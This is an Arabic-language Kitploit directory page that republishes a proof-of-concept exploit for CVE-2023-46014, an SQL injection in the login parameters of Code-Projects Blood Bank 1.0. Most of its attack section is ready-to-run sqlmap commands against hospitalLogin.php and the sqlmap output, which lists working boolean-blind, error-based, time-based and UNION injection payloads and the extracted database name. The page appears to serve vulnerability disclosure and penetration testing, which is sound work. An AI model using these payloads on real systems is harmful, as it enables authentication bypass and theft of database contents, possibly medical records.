Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability — إثبات مفهوم لاستغلال ثغرة حقن SQL في Code-Projects Blood Bank V1.0، يستهدف معاملَي hemail وhpassword في hospitalLogin.php لتجاوز المصادقة واستخراج محتويات قاعدة البيانات. | Kitploit
أدوات/GitHubGitHub/ersinerenler/cve-2023-46014-code-projects-blood-bank-1.0-sql-injection-vulnerability
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubersinerenler/cve-2023-46014-code-projects-blood-bank-1.0-sql-injection-vulnerability

CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

إثبات مفهوم لاستغلال ثغرة حقن SQL في Code-Projects Blood Bank V1.0، يستهدف معاملَي hemail وhpassword في hospitalLogin.php لتجاوز المصادقة واستخراج محتويات قاعدة البيانات.

عرض المستودع
43منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

  • مؤلف الاستغلال: ersinerenler

الصفحة الرئيسية للمورّد

  • https://code-projects.org/blood-bank-in-php-with-source-code

رابط البرنامج

  • https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip

نظرة عامة

  • بنك الدم Code-Projects Blood Bank V1.0 معرّض لثغرة أمنية كبيرة ناشئة عن عدم كفاية الحماية على المعاملين 'hemail' و'hpassword' في ملف hospitalLogin.php. يمكن استغلال هذا الخلل لحقن استعلامات SQL خبيثة، مما يؤدي إلى وصول غير مصرح به واستخراج معلومات حساسة من قاعدة البيانات.

تفاصيل الثغرة

  • معرّف CVE: CVE-2023-46014
  • الإصدار المتأثر: Blood Bank V1.0
  • الملف المعرّض للثغرة: /hospitalLogin.php
  • أسماء المعاملات: hemail, hpassword
  • نوع الهجوم: محلي

المراجع:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46014
  • https://nvd.nist.gov/vuln/detail/CVE-2023-46014

الوصف

  • إن عدم التحقق السليم من صحة المدخلات وتنقيتها على المعاملين 'hemail' و'hpassword' يسمح للمهاجم بصياغة استعلامات حقن SQL، وتجاوز آليات المصادقة، والحصول على وصول غير مصرح به إلى قاعدة البيانات
صورة

إثبات المفهوم (PoC) :

  • sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p hemail --risk 3 --level 3 --dbms mysql --batch --current-db
root@kitploit:~
---
Parameter: hemail (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: hemail=test@test' AND 3778=(SELECT (CASE WHEN (3778=3778) THEN 3778 ELSE (SELECT 9754 UNION SELECT 4153) END))-- -&hpassword=test&hlogin=Login

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: hemail=test@test' OR (SELECT 3342 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(3342=3342,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NSQu&hpassword=test&hlogin=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: hemail=test@test' AND (SELECT 5639 FROM (SELECT(SLEEP(5)))ulgW)-- QYnb&hpassword=test&hlogin=Login

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: hemail=test@test' UNION ALL SELECT CONCAT(0x716a7a6b71,0x567a4f6f4b556976707668696878754f48514d6e63424a706f70714e6f62684f504a7a565178736a,0x7170767a71),NULL,NULL,NULL,NULL,NULL-- -&hpassword=test&hlogin=Login
---
  • sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p hpassword --risk 3 --level 3 --dbms mysql --batch --current-db
root@kitploit:~
---
Parameter: hpassword (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: hemail=test@test&hpassword=test' AND 4940=(SELECT (CASE WHEN (4940=4940) THEN 4940 ELSE (SELECT 5623 UNION SELECT 6789) END))-- -&hlogin=Login

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: hemail=test@test&hpassword=test' OR (SELECT 8207 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(8207=8207,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- TrPm&hlogin=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: hemail=test@test&hpassword=test' AND (SELECT 3303 FROM (SELECT(SLEEP(5)))PdPC)-- lTZZ&hlogin=Login

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: hemail=test@test&hpassword=test' UNION ALL SELECT NULL,CONCAT(0x716a7a6b71,0x5271514f636f6f46476f6365424b6e6166454c725751704d6f6c467968626a4e725172785955416d,0x7170767a71),NULL,NULL,NULL,NULL-- -&hlogin=Login
---
  • قاعدة البيانات الحالية: bloodbank
صورة
تنزيل الأداة